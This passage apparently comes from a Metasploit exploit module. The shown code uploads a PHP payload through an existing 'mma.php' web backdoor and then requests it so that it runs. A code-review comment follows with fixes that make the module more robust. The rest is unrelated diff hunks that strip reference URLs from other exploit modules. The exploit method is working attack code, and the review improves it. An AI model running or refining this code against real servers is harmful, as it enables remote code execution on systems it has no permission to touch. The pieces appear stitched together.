if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path)
payload_name = "#{rand_text_alpha(5)}.php"
print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
data = Rex::MIME::Message.new
data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
post_data = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res
if res.body =~ /uplod d0n3 in SAME file/
print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
register_files_for_cleanup(payload_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'Connection Timed Out')
end
send_request_cgi({
'uri' => normalize_uri(payload_name),
'method' => 'GET'
})
end
end
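Review bot: `check` dereferences `form` from `n.at('form[@id="uploader"]')` with no nil guard, so a page that has no such form raises NoMethodError at `form.search('input')` instead of returning Safe; add `return Exploit::CheckCode::Safe unless form` right after the lookup. `has_input_name?` likewise assumes every `input` carries a `name` attribute (`e.attributes['name'].value` fails on an unnamed input) and spells `any?` as `select { … }.empty? ? false : true`; `nodes.any? { |e| e['name'] == name }` is both safer and idiomatic. In `exploit`, a response whose body lacks the success marker is reported as `server returned #{res.code}`, which will usually be 200 and misleads the operator; say instead that the expected marker was absent from the response.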


@ -24,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2012-0261'],
['OSVDB', '78064'],
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,


@ -24,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2012-0262'],
['OSVDB', '78065'],
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,


@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2014-6034' ],
[ 'OSVDB', '112276' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
],
'Privileged' => true,


@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ "CVE", "2012-3153" ],
[ "OSVDB", "86395" ], # Matches CVE-2012-3152
[ "OSVDB", "86394" ], # Matches CVE-2012-3153
[ "EDB", "31253" ],
[ 'URL', "http://netinfiltration.com" ]
[ "EDB", "31253" ]
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => ['win', 'linux'],


@ -32,8 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2011-4075'],
['OSVDB', '76594'],
['BID', '50331'],
['URL', 'http://sourceforge.net/support/tracker.php?aid=3417184'],
['EDB', '18021'],
['EDB', '18021']
],
'Privileged' => false,
'Payload' =>


@ -113,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://charlie.bz/blog/rails-3.2.10-remote-code-execution'], #Initial exploit vector was taken from here
['URL', 'http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/']
],
'DisclosureDate' => 'Apr 11 2013',


@ -35,9 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '51061' ],
[ 'CVE', '2011-4642' ],
[ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ],
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ],
[ 'URL', 'http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf' ],
[ 'URL', 'http://www.sec-1.com/blog/wp-content/uploads/2011/12/splunkexploit.zip' ]
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ]
],
'Payload' =>
{


@ -36,8 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2012-0391'],
[ 'OSVDB', '78277'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
[ 'EDB', '18329']
],
'Platform' => %w{ java linux win },
'Privileged' => true,


@ -35,8 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2012-0394'],
[ 'OSVDB', '78276'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
